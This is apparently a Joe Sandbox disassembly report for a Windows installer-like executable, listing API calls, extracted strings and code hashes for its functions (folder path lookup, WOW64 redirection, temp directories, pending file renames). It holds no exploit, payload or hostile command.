• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                          • String ID: 5B
                                                                          • API String ID: 183575631-3738334870
                                                                          • Opcode ID: 2525fb3c05810e8562c46c69867c8ead6d06b13db06e753dcd3e83bb75084637
                                                                          • Instruction ID: 904541913dac979c95981ef11fb7d46e22315ee65c5a1a9273e4e0c77d2e9a1f
                                                                          • Opcode Fuzzy Hash: 2525fb3c05810e8562c46c69867c8ead6d06b13db06e753dcd3e83bb75084637
                                                                          • Instruction Fuzzy Hash: 073161B17402107AEB20AF65DC82F6B36989715709F10017BBA41AF2D7C67DED01876C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

Control-flow graph of the function at 0x4779b4 (basic blocks 4779b4-477aee; loads the SHFOLDER DLL and resolves SHGetFolderPathA via GetProcAddress, with error paths through subcall 451cc8; graph rendering omitted)
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(6E560000,SHGetFolderPathA), ref: 00477AB6
                                                                          Strings
                                                                          Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                          • API String ID: 190572456-1343262939
                                                                          • Opcode ID: 326d038cb5ed66d6965ef9f79b3615df5c39ec0eed82ce05998c1027af74040e
                                                                          • Instruction ID: 49185784d2d2767166d0e9f92b0e194c902f92e05003c5a198be5f154938151e
                                                                          • Opcode Fuzzy Hash: 326d038cb5ed66d6965ef9f79b3615df5c39ec0eed82ce05998c1027af74040e
                                                                          • Instruction Fuzzy Hash: 2D310030A042099FDB11EB95D8829DEB7B5EB44308FA08577E804E7351D778AF45CBAC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

Control-flow graph of the function at 0x42ed94 (basic blocks 42ed94-42eea2; GetActiveWindow, GetFocus, RegisterClassA, two CreateWindowExA calls for the TWindowDisabler-Window class, ShowWindow, SetFocus; graph rendering omitted)
                                                                          APIs
                                                                          • GetActiveWindow.USER32 ref: 0042EDC3
                                                                          • GetFocus.USER32 ref: 0042EDCB
                                                                          • RegisterClassA.USER32(004937AC), ref: 0042EDEC
                                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042EEC0,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042EE2A
                                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042EE70
                                                                          • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042EE81
                                                                          • SetFocus.USER32(00000000,00000000,0042EEA3,?,?,?,00000001,00000000,?,00456712,00000000,00494628), ref: 0042EE88
                                                                          Strings
                                                                          Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                          • String ID: (FI$TWindowDisabler-Window
                                                                          • API String ID: 3167913817-373594729
                                                                          • Opcode ID: a3ca60a75e732bb51453dddc2c490802b9d7a662ac09df4b556055ac6f1e94aa
                                                                          • Instruction ID: da0a8043275c7bf3a93fe4eefa1d540893f351b9f71510032f8cfd414f1a65c9
                                                                          • Opcode Fuzzy Hash: a3ca60a75e732bb51453dddc2c490802b9d7a662ac09df4b556055ac6f1e94aa
                                                                          • Instruction Fuzzy Hash: 6721B2B1740711BAE220EF62DC02F1B76A8EB45B04F61413BF600AB2D1D7BC6D11C6AD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

Control-flow graph of the function at 0x451b74 (basic blocks 451b74-451c0c; resolves Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection from kernel32.dll via GetModuleHandleA/GetProcAddress; graph rendering omitted)
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451C0D,?,?,?,?,00000000,?,0049297B), ref: 00451B94
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451B9A
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451C0D,?,?,?,?,00000000,?,0049297B), ref: 00451BAE
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451BB4
                                                                          Strings
                                                                          Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                          • API String ID: 1646373207-2130885113
                                                                          • Opcode ID: f383fb48213f6c2b98df67bb585b7a3e2d1d6244cf436abb077e6f35d80479e6
                                                                          • Instruction ID: 997ed90857de5ca6b6faab55f770a1a30dabd985267bea0a56e7b9690acb7eff
                                                                          • Opcode Fuzzy Hash: f383fb48213f6c2b98df67bb585b7a3e2d1d6244cf436abb077e6f35d80479e6
                                                                          • Instruction Fuzzy Hash: 4201D474284304AEDB02EB72EC06F5B3A58F751B1AF60487BF800562A3D6FD5D09CA2D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004777FB,?,?,00000000,00494628,00000000,00000000,?,00492351,00000000,004924FA,?,00000000), ref: 0047771B
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,004777FB,?,?,00000000,00494628,00000000,00000000,?,00492351,00000000,004924FA,?,00000000), ref: 00477724
                                                                          Strings
                                                                          Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup
                                                                          • API String ID: 1375471231-1421604804
                                                                          • Opcode ID: 9af9e5047942150dd1bdaf748b612ec8dc7c41cda999b56e55422ae8274150d3
                                                                          • Instruction ID: 4b0667b2ca952db17e5eb31d7eb45e66b75ce74adbb243fdaac5edde39bfd4c6
                                                                          • Opcode Fuzzy Hash: 9af9e5047942150dd1bdaf748b612ec8dc7c41cda999b56e55422ae8274150d3
                                                                          • Instruction Fuzzy Hash: B3415634A002099BCB01FF95C891ADEB7B5FB44304F50857BE81477396D738AE05CBA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • RegisterClipboardFormatA.USER32(commdlg_help), ref: 0043017C
                                                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0043018B
                                                                          • GetCurrentThreadId.KERNEL32 ref: 004301A5
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 004301C6
                                                                          Strings
                                                                          Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                          • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                          • API String ID: 4130936913-2943970505
                                                                          • Opcode ID: e1a288e5974f646cac8171a9bb8c2e0076bf1e8d900104ca3b2b9541d9e9a9a5
                                                                          • Instruction ID: 40284a23f2128dd4c732f76bf629692f59332b695a7ba269acd0c8d21ef7b0e1
                                                                          • Opcode Fuzzy Hash: e1a288e5974f646cac8171a9bb8c2e0076bf1e8d900104ca3b2b9541d9e9a9a5
                                                                          • Instruction Fuzzy Hash: ACF082B04483408AD700EB75C802B197BE4EB99318F00467FB858A63E1D77E8501CB5F
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,0045399C,0045399C,00000031,0045399C,00000000), ref: 00453928
                                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,0045399C,0045399C,00000031,0045399C), ref: 00453935
                                                                            • Part of subcall function 004536EC: WaitForInputIdle.USER32(00000001,00000032), ref: 00453718
                                                                            • Part of subcall function 004536EC: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 0045373A
                                                                            • Part of subcall function 004536EC: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00453749
                                                                            • Part of subcall function 004536EC: CloseHandle.KERNEL32(00000001,00453776,0045376F,?,00000031,00000080,00000000,?,?,00453AC7,00000080,0000003C,00000000,00453ADD), ref: 00453769
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                          • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                          • API String ID: 854858120-615399546
                                                                          • Opcode ID: 3ba6da27587f0247c6075d637dc04b84a3427199ed6966589dcae68aca958c76
                                                                          • Instruction ID: 23b7935fd39ab9199875fd3ca17ea8a190fbf679708bf4b94726f8b76bbbb425
                                                                          • Opcode Fuzzy Hash: 3ba6da27587f0247c6075d637dc04b84a3427199ed6966589dcae68aca958c76
                                                                          • Instruction Fuzzy Hash: 385148B470034DABDB11EFA5CC41BDEBBB9AF44746F50443BB804A7282D7799B098B58
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%
                                                                          APIs
                                                                          • LoadIconA.USER32(00400000,MAINICON), ref: 0042368C
                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 004236B9
                                                                          • OemToCharA.USER32(?,?), ref: 004236CC
                                                                          • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 0042370C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Char$FileIconLoadLowerModuleName
                                                                          • String ID: 2$MAINICON
                                                                          • API String ID: 3935243913-3181700818
                                                                          • Opcode ID: 0aa366c20d2d5f249e9f5701ecd4d5d8333df010bd072e77a87ccb3058afe0f7
                                                                          • Instruction ID: 369b424dc89666f2ebc4032af242e6aa1f8f3c6487aa9724dd5eac47ff86fd2b
                                                                          • Opcode Fuzzy Hash: 0aa366c20d2d5f249e9f5701ecd4d5d8333df010bd072e77a87ccb3058afe0f7
                                                                          • Instruction Fuzzy Hash: EC31C4B0A042449ADF10EF29C8C57C67BE8AF14308F4440BAE844DB383D7BED989CB65
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%
                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 00418EAD
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418ECE
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00418EE9
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F0A
                                                                            • Part of subcall function 00423038: 73A1A570.USER32(00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 0042308E
                                                                            • Part of subcall function 00423038: EnumFontsA.GDI32(00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 004230A1
                                                                            • Part of subcall function 00423038: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230A9
                                                                            • Part of subcall function 00423038: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230B4
                                                                            • Part of subcall function 004235FC: LoadIconA.USER32(00400000,MAINICON), ref: 0042368C
                                                                            • Part of subcall function 004235FC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 004236B9
                                                                            • Part of subcall function 004235FC: OemToCharA.USER32(?,?), ref: 004236CC
                                                                            • Part of subcall function 004235FC: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 0042370C
                                                                            • Part of subcall function 0041F088: GetVersion.KERNEL32(?,00418F60,00000000,?,?,?,00000001), ref: 0041F096
                                                                            • Part of subcall function 0041F088: SetErrorMode.KERNEL32(00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0B2
                                                                            • Part of subcall function 0041F088: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0BE
                                                                            • Part of subcall function 0041F088: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0CC
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F0FC
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F125
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F13A
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F14F
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F164
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F179
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F18E
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F1A3
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F1B8
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F1CD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                          • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                          • API String ID: 3864787166-2767913252
                                                                          • Opcode ID: b3f6e413c8898143d790cb1a0652853cd6d9d94ba28684c67143a23da7476cd1
                                                                          • Instruction ID: 92c0f9287c22c5e7546306507112dd287fc16e7faa7ca2eb1c3947f0aa7fa29a
                                                                          • Opcode Fuzzy Hash: b3f6e413c8898143d790cb1a0652853cd6d9d94ba28684c67143a23da7476cd1
                                                                          • Instruction Fuzzy Hash: 511160B06142409AC700FF6AE84274A77E0EBA930DF40853FF548DB2A1DB3D9946CB5E
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%
                                                                          APIs
                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 004135D4
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004135DF
                                                                          • GetWindowLongA.USER32(?,000000F4), ref: 004135F1
                                                                          • SetWindowLongA.USER32(?,000000F4,?), ref: 00413604
                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 0041361B
                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 00413632
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow$Prop
                                                                          • String ID:
                                                                          • API String ID: 3887896539-0
                                                                          • Opcode ID: ac9e2524259f19aa4ae75357c34db2059614287f421b72dcfc2803ed6b471743
                                                                          • Instruction ID: 8501a907ea9830ee22782c43eb3b10d12b3a7942569ffdc076e3785703ae90ad
                                                                          • Opcode Fuzzy Hash: ac9e2524259f19aa4ae75357c34db2059614287f421b72dcfc2803ed6b471743
                                                                          • Instruction Fuzzy Hash: 0911FC75200204BFCB00DF99DC84E9A3BE8AB09365F104266B928DB2A1D738EE908B54
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%
                                                                          APIs
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0046DD25,?,00000000,?,00000001,00000000,0046DEF3,?,00000000,?,00000000,?,0046E0AE), ref: 0046DD01
                                                                          • FindClose.KERNEL32(000000FF,0046DD2C,0046DD25,?,00000000,?,00000001,00000000,0046DEF3,?,00000000,?,00000000,?,0046E0AE,?), ref: 0046DD1F
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0046DE47,?,00000000,?,00000001,00000000,0046DEF3,?,00000000,?,00000000,?,0046E0AE), ref: 0046DE23
                                                                          • FindClose.KERNEL32(000000FF,0046DE4E,0046DE47,?,00000000,?,00000001,00000000,0046DEF3,?,00000000,?,00000000,?,0046E0AE,?), ref: 0046DE41
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileNext
                                                                          • String ID: UF
                                                                          • API String ID: 2066263336-3088804789
                                                                          • Opcode ID: f2465bc261f959717d47697a8d45f32f7a1ade22301a2265577b1f26eed1a576
                                                                          • Instruction ID: 7787c03929e80ffec34d714e2f8fb83db301553702bc5b4ecfdbbcdcf4a79d9f
                                                                          • Opcode Fuzzy Hash: f2465bc261f959717d47697a8d45f32f7a1ade22301a2265577b1f26eed1a576
                                                                          • Instruction Fuzzy Hash: C2B11B74E0424D9FCF11DFA5C881ADEBBB9BF4C304F5081AAE808A7251D7399A46CF55
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%
                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00453FD7,?,00000000,00454017), ref: 00453F1D
                                                                          Strings
                                                                          • PendingFileRenameOperations2, xrefs: 00453EEC
                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00453EA0
                                                                          • PendingFileRenameOperations, xrefs: 00453EBC
                                                                          • WININIT.INI, xrefs: 00453F4C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                          • API String ID: 47109696-2199428270
                                                                          • Opcode ID: 6a4b91970a201f8e62ec4ce35f438840b63ea26c0fa97f58e3d9b69a11e17943
                                                                          • Instruction ID: 2ff6c49e49fdc546bb7a45c023e4930071e44da3c5b1decde5d7ffad05d461ef
                                                                          • Opcode Fuzzy Hash: 6a4b91970a201f8e62ec4ce35f438840b63ea26c0fa97f58e3d9b69a11e17943
                                                                          • Instruction Fuzzy Hash: BF51C831E041089FDB10DF61DC52ADEF7B9EB84705F60817BF804A72C2DB78AA45CA18
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%
                                                                          APIs
                                                                          • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 004636CD
                                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 004636F3
                                                                            • Part of subcall function 00463570: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00463608
                                                                            • Part of subcall function 00463570: DestroyCursor.USER32(00000000), ref: 0046361E
                                                                          • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 0046374F
                                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00463775
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$ExtractFileInfo$CursorDestroyDraw
                                                                          • String ID: c:\directory
                                                                          • API String ID: 2926980410-3984940477
                                                                          • Opcode ID: 6691f682c62b404754f8d66222e799753b1ee5a40e648aa7774ae51fe24a4016
                                                                          • Instruction ID: bae189fc96b8bd3553fc63f17e14eeae1d3b5729288d1f1a5c0b2b9fb69e759c
                                                                          • Opcode Fuzzy Hash: 6691f682c62b404754f8d66222e799753b1ee5a40e648aa7774ae51fe24a4016
                                                                          • Instruction Fuzzy Hash: CB4171B4600244AFD711DF55DC8AFDEBBE8EB48705F1081B6F904D7391E678AE408A59
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 004535F2
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,004536B8), ref: 0045365C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressByteCharMultiProcWide
                                                                          • String ID: P@!n$SfcIsFileProtected$sfc.dll
                                                                          • API String ID: 2508298434-664636605
                                                                          • Opcode ID: f0ce954cf5e6c0f92a7d370075d7fcb6cf00d1472f275adf203a8e9d9dbee81d
                                                                          • Instruction ID: be851dfb18f8685af01f62dd8973d7430abba5c381566a94229306a2653f0790
                                                                          • Opcode Fuzzy Hash: f0ce954cf5e6c0f92a7d370075d7fcb6cf00d1472f275adf203a8e9d9dbee81d
                                                                          • Instruction Fuzzy Hash: 33419770A00318ABEB20DF55DC85B9D77B8AB54346F5040BBA808A7393D7789F49CE5C
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%
                                                                          APIs
                                                                          • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0042DC88
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DE0B,00000000,0042DE23,?,?,?,?,00000006,?,00000000,00491717), ref: 0042DCA3
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DCA9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
